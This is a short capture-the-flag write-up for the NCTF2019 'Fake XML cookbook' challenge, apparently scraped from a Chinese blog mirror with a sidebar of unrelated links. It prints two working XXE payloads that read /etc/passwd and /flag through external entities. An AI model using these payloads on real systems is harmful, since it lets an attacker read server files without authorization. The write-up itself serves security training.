当前位置:网站首页>[NCTF2019]Fake XML cookbook
[NCTF2019]Fake XML cookbook
2022-07-16 05:42:00 【Bnessy】
According to the title, it is XXE Loophole , direct burp Grab the bag and have a look , Found to have XML Entity 
Try to read the next file
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///etc/passwd"> ]>
<user><username>&admin;</username><password>admin</password></user>
commonly flag All in the root directory , Modify the payload Read flag
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///flag"> ]>
<user><username>&admin;</username><password>admin</password></user>
边栏推荐
- Network security emergency response - electronic data forensics technology
- 自上而下获取父节点的id的集合
- win10下测试mysql主从同步
- 【黄啊码】微软IE浏览器将退役 网友说:以后考试报名咋办?
- ramda. JS API quick check
- 網絡安全應急響應-電子數據取證技術
- JS scope and scope chain
- js--笔试题(集)
- Secondary development tutorial of fastadmin [simple construction, multi table problems, API development]
- Steps for JS parsing engine to execute JS code
猜你喜欢
el-button 显示与禁用
ES6--let与const
BUUCTF 面具下的flag
memo、useMemo、useCallback总结
BUUCTF 来首歌吧
![[an Xun cup 2019]easy_ web](/img/9d/f2c6fda2a96f4ac649dd553c9c2c55.png)
[an Xun cup 2019]easy_ web
Simply understand the three handshakes and four waves of TCP
Automated machine learning
Sécurité des réseaux intervention d'urgence - technologie de collecte de données électroniques
JS scope and scope chain
随机推荐
笔记---常更
Componentized coding process -- todo list case
[WUSTCTF2020]朴实无华
[安洵杯 2019]easy_web
ramda.js api 速查
Component foundation of component-based programming
[ASIS 2019]Unicorn shop
【黄啊码】微软IE浏览器将退役 网友说:以后考试报名咋办?
Basic knowledge of network
Single file component
Steps for JS parsing engine to execute JS code
千亿参数的广告模型,是怎样炼成的?
BUUCTF 后门查杀
fastadmin的二次开发教程【简单搭建、多表格问题,API开发】
Understanding service governance in distributed development
Modularity CMJ & ESM
idea发送邮件
js解析引擎执行js代码的步骤
[Huang ah code] PHP cooperates with xlwriter to realize infinite header level excel export
移动web开发